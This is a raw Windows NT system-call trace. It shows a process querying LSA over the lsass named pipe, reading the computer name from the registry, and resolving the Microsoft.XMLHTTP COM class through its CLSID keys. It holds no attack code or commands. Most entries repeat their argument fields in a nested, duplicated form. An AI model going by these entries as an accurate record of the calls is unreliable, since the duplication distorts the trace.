 02084   456   NtReadFile  (292, 261, 0, 0, 1024, {0, 0}, 0, ... {status=0x0, info=68},  (292, 261, 0, 0, 1024, {0, 0}, 0, ... {status=0x0, info=68}, "\5\0\14\3\20\0\0\0D\0\0\0\1\0\0\0\270\20\270\20A\33\0\0\14\0\PIPE\lsass\0\0\0\1\0\0\0\0\0\0\0\4]\210\212\353\34\311\21\237\350\10\0+\20H`\2\0\0\0", ) , ) == 0x0
 02085   456   NtFsControlFile  (292, 261, 0x0, 0x0, 0x11c017,  (292, 261, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0@\0\0\0\1\0\0\0(\0\0\0\0\0,\0\0\0\0\0\30\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\234\365\22\0\14\0\0\0\2\0\1\0\0\10\0\0", 64, 1024, ... {status=0x103, info=68}, "\5\0\14\3\20\0\0\0D\0\0\0\1\0\0\0\270\20\270\20A\33\0\0\14\0\PIPE\lsass\0\0\0\1\0\0\0\0\0\0\0\4]\210\212\353\34\311\21\237\350\10\0+\20H`\2\0\0\0", ) , 64, 1024, ... {status=0x103, info=68},  (292, 261, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0@\0\0\0\1\0\0\0(\0\0\0\0\0,\0\0\0\0\0\30\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\234\365\22\0\14\0\0\0\2\0\1\0\0\10\0\0", 64, 1024, ... {status=0x103, info=68}, "\5\0\14\3\20\0\0\0D\0\0\0\1\0\0\0\270\20\270\20A\33\0\0\14\0\PIPE\lsass\0\0\0\1\0\0\0\0\0\0\0\4]\210\212\353\34\311\21\237\350\10\0+\20H`\2\0\0\0", ) , ) == 0x103
 02086   456   NtFsControlFile  (292, 261, 0x0, 0x0, 0x11c017,  (292, 261, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0t\0\0\0\2\0\0\0\\0\0\0\0\09\0\0\0\0\0V\304/K\351?\334\21\261\310\0\14)\371\246\305\1\0\0\0\324\365\22\0\1\0\0\0\310\366\22\0\5\0\0\0\1\5\0\0\0\0\0\5\25\0\0\0\3757B@\335\350\344\34C\27\122\353\3\0\0\0\0\0\0\0\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0", 116, 1024, ... {status=0x103, info=48}, "\5\0\2\3\20\0\0\00\0\0\0\1\0\0\0\30\0\0\0\0\0\0\0\0\0\0\0V\304/K\351?\334\21\261\310\0\14)\371\246\305\0\0\0\0", ) , 116, 1024, ... {status=0x103, info=48},  (292, 261, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0t\0\0\0\2\0\0\0\\0\0\0\0\09\0\0\0\0\0V\304/K\351?\334\21\261\310\0\14)\371\246\305\1\0\0\0\324\365\22\0\1\0\0\0\310\366\22\0\5\0\0\0\1\5\0\0\0\0\0\5\25\0\0\0\3757B@\335\350\344\34C\27\122\353\3\0\0\0\0\0\0\0\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0", 116, 1024, ... {status=0x103, info=48}, "\5\0\2\3\20\0\0\00\0\0\0\1\0\0\0\30\0\0\0\0\0\0\0\0\0\0\0V\304/K\351?\334\21\261\310\0\14)\371\246\305\0\0\0\0", ) , ) == 0x103
 02087   456   NtAllocateVirtualMemory  (-1, 1404928, 0, 4096, 4096, 4, ... 1404928, 4096, ) == 0x0
 02088   456   NtFsControlFile  (292, 261, 0x0, 0x0, 0x11c017,  (292, 261, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0,\0\0\0\3\0\0\0\24\0\0\0\0\0\0\0\0\0\0\0V\304/K\351?\334\21\261\310\0\14)\371\246\305", 44, 1024, ... {status=0x103, info=180}, "\5\0\2\3\20\0\0\0\264\0\0\0\2\0\0\0\234\0\0\0\0\0\0\0\270o\25\0\1\0\0\0\304o\25\0 \0\0\0\1\0\0\0\16\0\20\0\320o\25\0\340o\25\0\10\0\0\0\0\0\0\0\7\0\0\0M\0Y\0W\0O\0R\0L\0D\0\0\0\4\0\0\0\1\4\0\0\0\0\0\5\25\0\0\0\3757B@\335\350\344\34C\27\122\1\0\0\0 p\25\0\1\0\0\0\1\0\0\0\20\0\22\04p\25\0\0\0\0\0\0\0\0\0\11\0\0\0\0\0\0\0\10\0\0\0S\0R\0I\0-\0u\0s\0e\0r\0\1\0\0\0\0\0\0\0", ) , 44, 1024, ... {status=0x103, info=180},  (292, 261, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0,\0\0\0\3\0\0\0\24\0\0\0\0\0\0\0\0\0\0\0V\304/K\351?\334\21\261\310\0\14)\371\246\305", 44, 1024, ... {status=0x103, info=180}, "\5\0\2\3\20\0\0\0\264\0\0\0\2\0\0\0\234\0\0\0\0\0\0\0\270o\25\0\1\0\0\0\304o\25\0 \0\0\0\1\0\0\0\16\0\20\0\320o\25\0\340o\25\0\10\0\0\0\0\0\0\0\7\0\0\0M\0Y\0W\0O\0R\0L\0D\0\0\0\4\0\0\0\1\4\0\0\0\0\0\5\25\0\0\0\3757B@\335\350\344\34C\27\122\1\0\0\0 p\25\0\1\0\0\0\1\0\0\0\20\0\22\04p\25\0\0\0\0\0\0\0\0\0\11\0\0\0\0\0\0\0\10\0\0\0S\0R\0I\0-\0u\0s\0e\0r\0\1\0\0\0\0\0\0\0", ) , ) == 0x103
 02089   456   NtClose  (288, ... ) == 0x0
 02090   456   NtClose  (292, ... ) == 0x0
 02091   456   NtClose  (272, ... ) == 0x0
 02092   456   NtOpenThreadToken  (-2, 0x4, 1, ... ) == STATUS_NO_TOKEN
 02093   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\System\CurrentControlSet\Control\ComputerName"}, ... 272, ) }, ... 272, ) == 0x0
 02094   456   NtOpenKey  (0x20019, {24, 272, 0x40, 0, 0,  (0x20019, {24, 272, 0x40, 0, 0, "ActiveComputerName"}, ... 292, ) }, ... 292, ) == 0x0
 02095   456   NtQueryValueKey  (292,  (292, "ComputerName", Full, 108, ... TitleIdx=0, Type=1, Name="ComputerName", Data="M\0Y\0W\0O\0R\0L\0D\0\0\0"}, 60, ) , Full, 108, ... TitleIdx=0, Type=1, Name= (292, "ComputerName", Full, 108, ... TitleIdx=0, Type=1, Name="ComputerName", Data="M\0Y\0W\0O\0R\0L\0D\0\0\0"}, 60, ) , Data= (292, "ComputerName", Full, 108, ... TitleIdx=0, Type=1, Name="ComputerName", Data="M\0Y\0W\0O\0R\0L\0D\0\0\0"}, 60, ) }, 60, ) == 0x0
 02096   456   NtClose  (292, ... ) == 0x0
 02097   456   NtClose  (272, ... ) == 0x0
 02098   456   NtCreatePort  ({24, 0, 0x40, 1400296, 0,  ({24, 0, 0x40, 1400296, 0, "\RPC Control\OLE9"}, 112, 256, 0, ... 272, ) }, 112, 256, 0, ... 272, ) == 0x0
 02099   456   NtCreateEvent  (0x1f0003, 0x0, 0, 0, ... 292, ) == 0x0
 02100   456   NtOpenThreadToken  (-2, 0xc, 1, ... ) == STATUS_NO_TOKEN
 02101   456   NtAllocateVirtualMemory  (-1, 0, 0, 1048576, 8192, 4, ... 12386304, 1048576, ) == 0x0
 02102   456   NtAllocateVirtualMemory  (-1, 13426688, 0, 8192, 4096, 4, ... 13426688, 8192, ) == 0x0
 02103   456   NtProtectVirtualMemory  (-1, (0xcce000), 4096, 260, ... (0xcce000), 4096, 4, ) == 0x0
 02104   456   NtCreateThread  (0x1f03ff, 0x0, -1, 1241816, 1242532, 1, ... 288, {452, 788}, ) == 0x0
 02105   456   NtQueryInformationThread  (288, Basic, 28, ... {ExitStatus=0x103,TebBaseAddress=0x7ffdc000,Pid=452,Tid=788,}, 0x0, ) == 0x0
 02106   456   NtRequestWaitReplyPort  (24, {28, 56, new_msg, 0, 0, 0, 0, 1998454784}  (24, {28, 56, new_msg, 0, 0, 0, 0, 1998454784} "\0\0\0\0\1\0\1\0\0\0\0\0\355\246\335w \1\0\0\304\1\0\0\24\3\0\0" ... {28, 56, reply, 0, 452, 456, 1565, 0} "\0\0\0\0\1\0\1\0\0\0\0\0\355\246\335w \1\0\0\304\1\0\0\24\3\0\0" )  ... {28, 56, reply, 0, 452, 456, 1565, 0}  (24, {28, 56, new_msg, 0, 0, 0, 0, 1998454784} "\0\0\0\0\1\0\1\0\0\0\0\0\355\246\335w \1\0\0\304\1\0\0\24\3\0\0" ... {28, 56, reply, 0, 452, 456, 1565, 0} "\0\0\0\0\1\0\1\0\0\0\0\0\355\246\335w \1\0\0\304\1\0\0\24\3\0\0" )  ) == 0x0
 02107   456   NtResumeThread  (288, ... 1, ) == 0x0
 02108   456   NtOpenEvent  (0x1f0003, {24, 64, 0x0, 0, 0,  (0x1f0003, {24, 64, 0x0, 0, 0, "MSFT.VSA.COM.DISABLE.452"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02109   456   NtOpenEvent  (0x100002, {24, 64, 0x0, 0, 0,  (0x100002, {24, 64, 0x0, 0, 0, "MSFT.VSA.IEC.STATUS.6c736db0"}, ... }, ...
 02110   788   NtTestAlert  (... ) == 0x0
 02111   788   NtContinue  (13434160, 1, ...
 02112   788   NtRegisterThreadTerminatePort  (24, ... ) == 0x0
 02113   788   NtReplyWaitReceivePortEx  (272, 0x0, {-300000000, -1}, ...
 02109   456   NtOpenEvent  ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02114   456   NtAllocateVirtualMemory  (-1, 1409024, 0, 4096, 4096, 4, ... 1409024, 4096, ) == 0x0
 02115   456   NtAllocateVirtualMemory  (-1, 1413120, 0, 4096, 4096, 4, ... 1413120, 4096, ) == 0x0
 02116   456   NtRequestWaitReplyPort  (264, {228, 252, new_msg, 0, 452, 456, 1563, 0}  (264, {228, 252, new_msg, 0, 452, 456, 1563, 0} "\1\32\0\0A\2\4\0X[\214\0\0\0\0\0\2\2\0\0\5\0\0\0\377\377\377\377\2\0\0\0\0\0\0\0\245\371\0J\351?\334\21\261\310\0\14)\371\246\305\1\0\0\0\24\0\0\0\310\1\0\0\304\1\0\0\2\0\0\0\5\0\6\0\0\0\0\0\304\1\0\0\310\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\220e\25\0\22\0\0\0\22\0\20\0n\0c\0a\0l\0r\0p\0c\0:\0[\0O\0L\0E\09\0]\0\0\0\0\0\0\0\0\0\30;\25\0\26\0\0\0\26\0\2\0\0\0\0\0\12\0\377\377M\0Y\0W\0O\0R\0L\0D\0\\0S\0R\0I\0-\0u\0s\0e\0r\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0" ... {40, 64, reply, 0, 452, 456, 1566, 0} "\2\0\0\0\4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\24\1\0\0\350\347\12\0" )  ... {40, 64, reply, 0, 452, 456, 1566, 0}  (264, {228, 252, new_msg, 0, 452, 456, 1563, 0} "\1\32\0\0A\2\4\0X[\214\0\0\0\0\0\2\2\0\0\5\0\0\0\377\377\377\377\2\0\0\0\0\0\0\0\245\371\0J\351?\334\21\261\310\0\14)\371\246\305\1\0\0\0\24\0\0\0\310\1\0\0\304\1\0\0\2\0\0\0\5\0\6\0\0\0\0\0\304\1\0\0\310\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\220e\25\0\22\0\0\0\22\0\20\0n\0c\0a\0l\0r\0p\0c\0:\0[\0O\0L\0E\09\0]\0\0\0\0\0\0\0\0\0\30;\25\0\26\0\0\0\26\0\2\0\0\0\0\0\12\0\377\377M\0Y\0W\0O\0R\0L\0D\0\\0S\0R\0I\0-\0u\0s\0e\0r\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0" ... {40, 64, reply, 0, 452, 456, 1566, 0} "\2\0\0\0\4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\24\1\0\0\350\347\12\0" )  ) == 0x0
 02117   456   NtRequestWaitReplyPort  (264, {64, 88, new_msg, 56, 0, 1, 0, 0}  (264, {64, 88, new_msg, 56, 0, 1, 0, 0} "\10\361\22\0@\0\314w0N\25\0x\361\22\0\340\361\22\0P\263\36w\340\361\22\00N\25\0\1\0\0\00\227\25\0\24\1\0\0\24\1\0\0\350\347\12\0\0\0\0\0\0\0\0\0\34;\25\0" ... {64, 88, reply, 56, 452, 456, 1567, 0} "\10\361\22\0@\0\314w0N\25\0x\361\22\0\340\361\22\0P\263\36w\340\361\22\00N\25\0\1\0\0\00\227\25\0\24\1\0\0\24\1\0\0\350\347\12\0\0\0\0\0\0\0\0\0\34;\25\0" )  ... {64, 88, reply, 56, 452, 456, 1567, 0}  (264, {64, 88, new_msg, 56, 0, 1, 0, 0} "\10\361\22\0@\0\314w0N\25\0x\361\22\0\340\361\22\0P\263\36w\340\361\22\00N\25\0\1\0\0\00\227\25\0\24\1\0\0\24\1\0\0\350\347\12\0\0\0\0\0\0\0\0\0\34;\25\0" ... {64, 88, reply, 56, 452, 456, 1567, 0} "\10\361\22\0@\0\314w0N\25\0x\361\22\0\340\361\22\0P\263\36w\340\361\22\00N\25\0\1\0\0\00\227\25\0\24\1\0\0\24\1\0\0\350\347\12\0\0\0\0\0\0\0\0\0\34;\25\0" )  ) == 0x0
 02118   456   NtUserSetWindowLong  (131252, -4, 1998362453, 0, ... ) == 0x771c887f
 02119   456   NtAllocateVirtualMemory  (-1, 1417216, 0, 4096, 4096, 4, ... 1417216, 4096, ) == 0x0
 02120   456   NtAllocateVirtualMemory  (-1, 1224704, 0, 4096, 4096, 260, ... 1224704, 4096, ) == 0x0
 02121   456   NtAllocateVirtualMemory  (-1, 1220608, 0, 4096, 4096, 260, ... 1220608, 4096, ) == 0x0
 02122   456   NtAllocateVirtualMemory  (-1, 1216512, 0, 4096, 4096, 260, ... 1216512, 4096, ) == 0x0
 02123   456   NtOpenSection  (0x4, {24, 64, 0x2, 0, 0,  (0x4, {24, 64, 0x2, 0, 0, "Global\ComPlusCOMRegTable"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02124   456   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Microsoft\COM3"}, ... 296, ) }, ... 296, ) == 0x0
 02125   456   NtQueryValueKey  (296,  (296, "REGDBVersion", Partial, 144, ... TitleIdx=0, Type=3, Data="\7\0\0\0\0\0\0\0"}, 20, ) , Partial, 144, ... TitleIdx=0, Type=3, Data= (296, "REGDBVersion", Partial, 144, ... TitleIdx=0, Type=3, Data="\7\0\0\0\0\0\0\0"}, 20, ) }, 20, ) == 0x0
 02126   456   NtClose  (296, ... ) == 0x0
 02127   456   NtQueryKey  (90, Name, 384, ... {Name= (90, Name, 384, ... {Name="\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_CLASSES"}, 138, ) }, 138, ) == 0x0
 02128   456   NtOpenKey  (0x20019, {24, 90, 0x40, 0, 0,  (0x20019, {24, 90, 0x40, 0, 0, "Microsoft.XMLHTTP"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02129   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Classes\Microsoft.XMLHTTP"}, ... 296, ) }, ... 296, ) == 0x0
 02130   456   NtQueryKey  (298, Name, 384, ... {Name= (298, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\Microsoft.XMLHTTP"}, 108, ) }, 108, ) == 0x0
 02131   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02132   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 300, ) == 0x0
 02133   456   NtQueryInformationToken  (300, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02134   456   NtClose  (300, ... ) == 0x0
 02135   456   NtOpenKey  (0x1, {24, 0, 0x40, 0, 0,  (0x1, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\Microsoft.XMLHTTP\CLSID"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02136   456   NtOpenKey  (0x1, {24, 298, 0x40, 0, 0,  (0x1, {24, 298, 0x40, 0, 0, "CLSID"}, ... 300, ) }, ... 300, ) == 0x0
 02137   456   NtQueryKey  (302, Name, 392, ... {Name= (302, Name, 392, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\Microsoft.XMLHTTP\CLSID"}, 120, ) }, 120, ) == 0x0
 02138   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02139   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 304, ) == 0x0
 02140   456   NtQueryInformationToken  (304, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02141   456   NtClose  (304, ... ) == 0x0
 02142   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\Microsoft.XMLHTTP\CLSID"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02143   456   NtQueryValueKey  (302, 0x0, Partial, 144, ... TitleIdx=0, Type=1, Data= (302, 0x0, Partial, 144, ... TitleIdx=0, Type=1, Data="{\0E\0D\08\0C\01\00\08\0E\0-\04\03\04\09\0-\01\01\0D\02\0-\09\01\0A\04\0-\00\00\0C\00\04\0F\07\09\06\09\0E\08\0}\0\0\0"}, 90, ) }, 90, ) == 0x0
 02144   456   NtClose  (302, ... ) == 0x0
 02145   456   NtClose  (298, ... ) == 0x0
 02146   456   NtOpenSection  (0x4, {24, 64, 0x2, 0, 0,  (0x4, {24, 64, 0x2, 0, 0, "Global\ComPlusCOMRegTable"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02147   456   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Microsoft\COM3"}, ... 296, ) }, ... 296, ) == 0x0
 02148   456   NtQueryValueKey  (296,  (296, "REGDBVersion", Partial, 144, ... TitleIdx=0, Type=3, Data="\7\0\0\0\0\0\0\0"}, 20, ) , Partial, 144, ... TitleIdx=0, Type=3, Data= (296, "REGDBVersion", Partial, 144, ... TitleIdx=0, Type=3, Data="\7\0\0\0\0\0\0\0"}, 20, ) }, 20, ) == 0x0
 02149   456   NtClose  (296, ... ) == 0x0
 02150   456   NtOpenSection  (0x4, {24, 64, 0x2, 0, 0,  (0x4, {24, 64, 0x2, 0, 0, "Global\ComPlusCOMRegTable"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02151   456   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Microsoft\COM3"}, ... 296, ) }, ... 296, ) == 0x0
 02152   456   NtQueryValueKey  (296,  (296, "REGDBVersion", Partial, 144, ... TitleIdx=0, Type=3, Data="\7\0\0\0\0\0\0\0"}, 20, ) , Partial, 144, ... TitleIdx=0, Type=3, Data= (296, "REGDBVersion", Partial, 144, ... TitleIdx=0, Type=3, Data="\7\0\0\0\0\0\0\0"}, 20, ) }, 20, ) == 0x0
 02153   456   NtClose  (296, ... ) == 0x0
 02154   456   NtQueryKey  (90, Name, 384, ... {Name= (90, Name, 384, ... {Name="\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_CLASSES9"}, 138, ) }, 138, ) == 0x0
 02155   456   NtOpenKey  (0x20019, {24, 90, 0x40, 0, 0,  (0x20019, {24, 90, 0x40, 0, 0, "CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02156   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Classes\CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}"}, ... 296, ) }, ... 296, ) == 0x0
 02157   456   NtQueryKey  (298, Name, 384, ... {Name= (298, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}2"}, 162, ) }, 162, ) == 0x0
 02158   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02159   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 300, ) == 0x0
 02160   456   NtQueryInformationToken  (300, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02161   456   NtClose  (300, ... ) == 0x0
 02162   456   NtOpenKey  (0x1, {24, 0, 0x40, 0, 0,  (0x1, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}\TreatAs"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02163   456   NtOpenKey  (0x1, {24, 298, 0x40, 0, 0,  (0x1, {24, 298, 0x40, 0, 0, "TreatAs"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02164   456   NtClose  (298, ... ) == 0x0
 02165   456   NtOpenSection  (0x4, {24, 64, 0x2, 0, 0,  (0x4, {24, 64, 0x2, 0, 0, "Global\ComPlusCOMRegTable"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02166   456   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Microsoft\COM3"}, ... 296, ) }, ... 296, ) == 0x0
 02167   456   NtQueryValueKey  (296,  (296, "REGDBVersion", Partial, 144, ... TitleIdx=0, Type=3, Data="\7\0\0\0\0\0\0\0"}, 20, ) , Partial, 144, ... TitleIdx=0, Type=3, Data= (296, "REGDBVersion", Partial, 144, ... TitleIdx=0, Type=3, Data="\7\0\0\0\0\0\0\0"}, 20, ) }, 20, ) == 0x0
 02168   456   NtClose  (296, ... ) == 0x0
 02169   456   NtOpenSection  (0x4, {24, 64, 0x2, 0, 0,  (0x4, {24, 64, 0x2, 0, 0, "Global\ComPlusCOMRegTable"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02170   456   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Microsoft\COM3"}, ... 296, ) }, ... 296, ) == 0x0
 02171   456   NtQueryValueKey  (296,  (296, "REGDBVersion", Partial, 144, ... TitleIdx=0, Type=3, Data="\7\0\0\0\0\0\0\0"}, 20, ) , Partial, 144, ... TitleIdx=0, Type=3, Data= (296, "REGDBVersion", Partial, 144, ... TitleIdx=0, Type=3, Data="\7\0\0\0\0\0\0\0"}, 20, ) }, 20, ) == 0x0
 02172   456   NtClose  (296, ... ) == 0x0
 02173   456   NtQueryKey  (90, Name, 384, ... {Name= (90, Name, 384, ... {Name="\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_CLASSES9"}, 138, ) }, 138, ) == 0x0
 02174   456   NtOpenKey  (0x20019, {24, 90, 0x40, 0, 0,  (0x20019, {24, 90, 0x40, 0, 0, "CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02175   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Classes\CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}"}, ... 296, ) }, ... 296, ) == 0x0
 02176   456   NtQueryKey  (298, Name, 384, ... {Name= (298, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}2"}, 162, ) }, 162, ) == 0x0
 02177   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02178   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 300, ) == 0x0
 02179   456   NtQueryInformationToken  (300, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02180   456   NtClose  (300, ... ) == 0x0
 02181   456   NtOpenKey  (0x1, {24, 0, 0x40, 0, 0,  (0x1, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}\TreatAs"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02182   456   NtOpenKey  (0x1, {24, 298, 0x40, 0, 0,  (0x1, {24, 298, 0x40, 0, 0, "TreatAs"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02183   456   NtClose  (298, ... ) == 0x0
 02184   456   NtQueryKey  (90, Name, 384, ... {Name= (90, Name, 384, ... {Name="\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_CLASSES9"}, 138, ) }, 138, ) == 0x0
 02185   456   NtOpenKey  (0x20019, {24, 90, 0x40, 0, 0,  (0x20019, {24, 90, 0x40, 0, 0, "CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02186   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Classes\CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}"}, ... 296, ) }, ... 296, ) == 0x0
 02187   456   NtQueryKey  (298, Name, 384, ... {Name= (298, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}2"}, 162, ) }, 162, ) == 0x0
 02188   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02189   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 300, ) == 0x0
 02190   456   NtQueryInformationToken  (300, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02191   456   NtClose  (300, ... ) == 0x0
 02192   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}\InprocServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02193   456   NtOpenKey  (0x2000000, {24, 298, 0x40, 0, 0,  (0x2000000, {24, 298, 0x40, 0, 0, "InprocServer32"}, ... 300, ) }, ... 300, ) == 0x0
 02194   456   NtQueryKey  (302, Name, 392, ... {Name= (302, Name, 392, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}\InProcServer32"}, 192, ) }, 192, ) == 0x0
 02195   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02196   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 304, ) == 0x0
 02197   456   NtQueryInformationToken  (304, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02198   456   NtClose  (304, ... ) == 0x0
 02199   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}\InProcServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02200   456   NtQueryValueKey  (302,  (302, "InprocServer32", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02201   456   NtClose  (302, ... ) == 0x0
 02202   456   NtQueryKey  (298, Name, 384, ... {Name= (298, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}_"}, 162, ) }, 162, ) == 0x0
 02203   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02204   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 300, ) == 0x0
 02205   456   NtQueryInformationToken  (300, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02206   456   NtClose  (300, ... ) == 0x0
 02207   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}\InprocServerX86"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02208   456   NtOpenKey  (0x2000000, {24, 298, 0x40, 0, 0,  (0x2000000, {24, 298, 0x40, 0, 0, "InprocServerX86"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02209   456   NtQueryKey  (298, Name, 384, ... {Name= (298, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}_"}, 162, ) }, 162, ) == 0x0
